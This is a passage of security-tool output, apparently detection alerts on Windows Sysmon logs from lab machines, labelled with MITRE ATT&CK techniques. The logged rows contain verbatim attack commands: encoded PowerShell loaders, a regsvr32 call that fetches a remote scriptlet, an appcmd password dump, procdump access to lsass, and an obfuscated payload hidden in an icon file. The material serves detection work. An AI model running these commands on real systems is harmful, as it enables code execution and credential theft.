A9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1," 1 5 4 1 0 0x8000000000000000 13 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1086,technique_name=PowerShell 2019-04-18 16:56:08.340 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation Powershell C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-AB27-5CB8-0000-002021CA0000 0xca21 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-AC01-5CB8-0000-0010BB7E0700 1196 C:\Windows\System32\cmd.exe "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," 1 5 4 1 0 0x8000000000000000 18851 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-18 17:51:14.254 365ABB72-4612-5CE0-0000-00103D1E2600 2600 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll C:\Windows\system32\ IEWIN7\IEUser 365ABB72-433D-5CE0-0000-002031350100 0x13531 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-433C-5CE0-0000-00100FD20000 964 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 18851 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-18 17:51:14.254 365ABB72-4612-5CE0-0000-00103D1E2600 2600 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll C:\Windows\system32\ IEWIN7\IEUser 365ABB72-433D-5CE0-0000-002031350100 0x13531 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-433C-5CE0-0000-00100FD20000 964 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 18851 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-18 17:51:14.254 365ABB72-4612-5CE0-0000-00103D1E2600 2600 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll C:\Windows\system32\ IEWIN7\IEUser 365ABB72-433D-5CE0-0000-002031350100 0x13531 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-433C-5CE0-0000-00100FD20000 964 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5904 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.851 365ABB72-3D6D-5CEB-0000-0010C47BFF00 560 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," 1 5 4 1 0 0x8000000000000000 6192 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:54.612 365ABB72-FE76-5CEB-0000-001015780C00 1260 \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ? ? ? ? \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 365ABB72-FE6C-5CEB-0000-00104A170C00 3680 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," 1 5 4 1 0 0x8000000000000000 6192 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:54.612 365ABB72-FE76-5CEB-0000-001015780C00 1260 \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ? ? ? ? \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 365ABB72-FE6C-5CEB-0000-00104A170C00 3680 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\system32\calc.exe" ),1," 1 5 4 1 0 0x8000000000000000 16498 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:01:50.852 365ABB72-517E-5CD8-0000-00105FE01700 2920 C:\Windows\System32\calc.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\calc.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1 365ABB72-517E-5CD8-0000-001024D61700 2952 C:\Windows\System32\pcalua.exe "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," 1 5 4 1 0 0x8000000000000000 16396 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:38:00.592 365ABB72-21B8-5CD8-0000-0010E4E82600 2964 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-21B8-5CD8-0000-0010BADE2600 3856 C:\Windows\System32\rundll32.exe rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" ) contain suspicious command ( \mshta.exe),1," 1 5 4 1 0 0x8000000000000000 16396 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:38:00.592 365ABB72-21B8-5CD8-0000-0010E4E82600 2964 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-21B8-5CD8-0000-0010BADE2600 3856 C:\Windows\System32\rundll32.exe rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," 1 5 4 1 0 0x8000000000000000 16396 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:38:00.592 365ABB72-21B8-5CD8-0000-0010E4E82600 2964 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-21B8-5CD8-0000-0010BADE2600 3856 C:\Windows\System32\rundll32.exe rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1," 1 5 4 1 0 0x8000000000000000 374 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 00:35:07.386 365ABB72-47BB-5CE3-0000-001071AD3E00 3944 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /c test.bat C:\Users\IEUser\Downloads\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-47BB-5CE3-0000-0010BFA83E00 1912 C:\Users\IEUser\Downloads\com-hijack.exe "C:\Users\IEUser\Downloads\com-hijack.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 1966252 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:36:04.226 365ABB72-52B4-5C91-0000-0010D55B0100 1636 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-528D-5C91-0000-0020E7030000 0x3e7 0 System MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-528D-5C91-0000-001062560000 484 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," 10 3 4 10 0 0x8000000000000000 4434 Microsoft-Windows-Sysmon/Operational PC04.example.corp 2019-03-17 19:09:41.328 365ABB72-9B75-5C8E-0000-0010013F1200 1856 980 C:\Users\IEUser\Desktop\procdump.exe 365ABB72-0886-5C8F-0000-001030560000 476 C:\Windows\system32\lsass.exe 0x1fffff C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine ("C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 10675 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-14 12:17:14.661 747F3D96-FBCA-5D53-0000-001036784100 2876 C:\Windows\System32\wscript.exe 5.812.10240.16384 Microsoft ® Windows Based Script Host Microsoft ® Windows Script Host Microsoft Corporation "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX 